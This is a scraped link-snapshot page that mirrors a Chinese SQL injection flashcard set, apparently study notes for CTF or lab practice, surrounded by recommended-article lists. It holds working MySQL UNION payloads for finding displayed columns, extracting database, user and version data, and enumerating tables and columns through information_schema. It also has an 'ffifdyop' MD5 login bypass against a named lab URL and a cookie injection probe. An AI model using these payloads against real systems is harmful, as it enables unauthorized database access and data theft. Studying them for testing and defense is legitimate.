SQL注入 Flashcards by hello world | Brainscape

link管理

链接快照平台

输入网页链接，自动生成快照
标签化管理网页链接

相关文章推荐

叛逆的小蝌蚪 · C#——SqlParameter的使用方法及 ...· 22 小时前 ·

八块腹肌的烈酒 · SQL注入 Flashcards by ...· 4 天前 ·

长情的台灯 · 数据库操作 - ...· 5 天前 ·

灰常酷的小马驹 · Python 与 MySQL ...· 5 天前 ·

聪明伶俐的水龙头 · sqlite3_bind_int - CSDN文库· 5 天前 ·

朝气蓬勃的茶叶 · 具有自主知识产权的长效干扰素“派格宾”获批上 ...· 3 月前 ·

听话的小摩托 · 长沙的大学有哪些（名单汇总）- 长沙本地宝· 1 年前 ·

慷慨大方的泡面 · 探索讲好中国故事的翻译理论-新华网· 1 年前 ·

温文尔雅的绿茶 · 外貌协会必备：37个描述外表实用英语单词_手 ...· 1 年前 ·

强健的太阳 · 张尧总20年2000倍的投资经验总结原创：元 ...· 1 年前 ·

很可能是编码问题
方法1，用hex():
id=-1 union select 1,2,hex(concat(database(),0x5c,user(),0x5c,version())),4,5,6 from xxx

方法2，用convert():
id=-1 union select 1,2,convert(concat(database(),0x5c,user(),0x5c,version()) using latin1),4,5,6 from xxx

把数字用null全部替换掉
id =1 union select null,null,null,null,null,null,null,null,null,null,null,null,null%23
然后把null依次替换成相应数字，一次替换一个，如果正常返回就保留数字，如果错误就替换回null，在替换下一个数字（当然也可以替换文本‘a’，‘b’等，也可以数字文本相结合）

最后的结果是
union select null,2,3,null,‘a’,null,’b’,8,null,null,null,null,null%23，
这样就能够定位显示位是哪个了，这里如果开了gpc，可以把字符串都换成version()

http://lab1.xseclab.com/code1_9f44bab1964d2f959cf509763980e156/?userid=1&amp;pwd=ffifdyop
#ffifdyop经过md5加密后包含'or'

cookie中加;id=1’看是否报错
基本查询：结果order by 3成功，4报错

表名 UNION SELECT 1,table_name,3 from information_schema.tables where table_schema=database()

列名 UNION SELECT 1,column_name,3 from information_schema.columns where table_name=0x7361655f757365725f73716c6938

推荐文章

叛逆的小蝌蚪 · C#——SqlParameter的使用方法及注意事项-CSDN博客

22 小时前

八块腹肌的烈酒 · SQL注入 Flashcards by hello world | Brainscape

4 天前

长情的台灯 · 数据库操作 - 霍格沃兹测试开发学社-Python教程

5 天前

灰常酷的小马驹 · Python 与 MySQL 进行增删改查的操作以及防止SQL注入-阿里云开发者社区

5 天前

聪明伶俐的水龙头 · sqlite3_bind_int - CSDN文库

5 天前

朝气蓬勃的茶叶 · 具有自主知识产权的长效干扰素“派格宾”获批上市-中华人民共和国 ...

3 月前

听话的小摩托 · 长沙的大学有哪些（名单汇总）- 长沙本地宝

1 年前

慷慨大方的泡面 · 探索讲好中国故事的翻译理论-新华网

1 年前

温文尔雅的绿茶 · 外貌协会必备：37个描述外表实用英语单词_手机新浪网

1 年前

强健的太阳 · 张尧总20年2000倍的投资经验总结原创：元海一、价值投资在中国 ...

1 年前